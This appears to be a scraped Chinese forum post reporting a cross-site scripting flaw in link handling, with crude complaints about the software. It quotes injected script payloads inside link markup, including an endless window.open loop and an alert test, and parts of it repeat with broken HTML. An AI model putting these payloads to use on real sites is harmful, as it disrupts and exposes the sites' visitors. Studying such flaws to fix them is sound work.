<br><a href="<a href="http://a<script>while(1)window.open(window.location)</script>"" target="_blank">http://a<script>while(1)window.open(window.location)</script>"</a> target="_blank"></a>
<br><br><a href="<a href="http://a<script>alert(unescape('haha!%20a%20joke.'))</script>"" target="_blank">http://a<script>alert(unescape('haha!%20a%20joke.'))</script>"</a> target="_blank"></a>a经观察发现如上代码....看来插入超级链接时,NND只管是不是有http://前缀的...日
而且在显示该链接时,连编码都没有,也是直接显示出来的,我靠...这算什么嘛...垃圾代码一堆....
<br><br><a href="<a href="http://a<script>alert(unescape('haha!%20a%20joke.'))</script>"" target="_blank">http://a<script>alert(unescape('haha!%20a%20joke.'))</script>"</a> target="_blank"></a>a经观察发现如上代码....看来插入超级链接时,NND只管是不是有http://前缀的...日
而且在显示该链接时,连编码都没有,也是直接显示出来的,我靠...这算什么嘛...垃圾代码一堆....
解决方案 »
免费领取超大流量手机卡,每月29元包185G流量+100分钟通话, 中国电信官方发货